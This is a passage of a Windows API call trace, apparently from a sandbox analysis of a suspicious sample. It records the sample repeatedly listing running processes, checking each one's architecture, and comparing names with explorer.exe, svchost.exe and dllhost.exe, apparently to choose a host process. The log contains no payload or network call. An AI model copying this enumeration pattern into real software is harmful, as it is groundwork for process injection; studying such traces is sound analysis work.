Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.978] CloseHandle (hObject=0xd8) returned 1 [0241.978] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0241.978] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0241.978] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0241.978] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0241.978] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0241.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0241.979] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0241.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0241.979] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.979] CloseHandle (hObject=0xd8) returned 1 [0241.979] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0241.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0241.980] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.980] CloseHandle (hObject=0xd8) returned 1 [0241.980] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0241.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0241.981] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.981] CloseHandle (hObject=0xd8) returned 1 [0241.981] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0241.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0241.981] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.981] CloseHandle (hObject=0xd8) returned 1 [0241.981] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0241.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0241.982] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.982] CloseHandle (hObject=0xd8) returned 1 [0241.982] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0241.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0241.984] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.984] CloseHandle (hObject=0xd8) returned 1 [0241.984] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0241.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0241.985] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.985] CloseHandle (hObject=0xd8) returned 1 [0241.985] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0241.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0241.985] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.985] CloseHandle (hObject=0xd8) returned 1 [0241.985] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0241.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0241.986] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.986] CloseHandle (hObject=0xd8) returned 1 [0241.986] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0241.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0241.987] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.987] CloseHandle (hObject=0xd8) returned 1 [0241.987] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0241.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0241.987] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.987] CloseHandle (hObject=0xd8) returned 1 [0241.987] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0241.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0241.988] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.988] CloseHandle (hObject=0xd8) returned 1 [0241.988] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0241.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0241.988] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.988] CloseHandle (hObject=0xd8) returned 1 [0241.988] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0241.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0241.989] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.989] CloseHandle (hObject=0xd8) returned 1 [0241.989] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0241.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0241.990] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.990] CloseHandle (hObject=0xd8) returned 1 [0241.990] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0241.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0241.990] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.990] CloseHandle (hObject=0xd8) returned 1 [0241.990] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0241.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0241.991] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.991] CloseHandle (hObject=0xd8) returned 1 [0241.991] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0241.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0241.991] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.991] CloseHandle (hObject=0xd8) returned 1 [0241.991] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0241.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0241.992] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.992] CloseHandle (hObject=0xd8) returned 1 [0241.992] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0241.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0241.993] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.993] CloseHandle (hObject=0xd8) returned 1 [0241.993] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0241.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0241.993] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.993] CloseHandle (hObject=0xd8) returned 1 [0241.993] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0241.994] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0241.994] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0241.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0241.995] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0241.995] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0241.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0241.996] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0241.996] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.996] CloseHandle (hObject=0xd8) returned 1 [0241.996] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0241.996] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0241.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0241.997] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.997] CloseHandle (hObject=0xd8) returned 1 [0241.997] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0241.997] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0241.997] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0241.997] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0241.998] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0241.998] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.998] CloseHandle (hObject=0xd8) returned 1 [0241.998] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0241.999] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.999] CloseHandle (hObject=0xd8) returned 1 [0241.999] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0241.999] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0241.999] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0241.999] CloseHandle (hObject=0xd8) returned 1 [0241.999] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.000] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0242.000] CloseHandle (hObject=0xd4) returned 1 [0242.000] Sleep (dwMilliseconds=0x3e8) [0243.010] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0243.012] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.012] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0243.012] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0243.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0243.013] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0243.013] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0243.013] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0243.014] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0243.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0243.014] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0243.015] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0243.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0243.015] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0243.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0243.016] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0243.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0243.016] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0243.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0243.017] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0243.017] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0243.018] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0243.018] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0243.019] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0243.019] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0243.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0243.020] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, 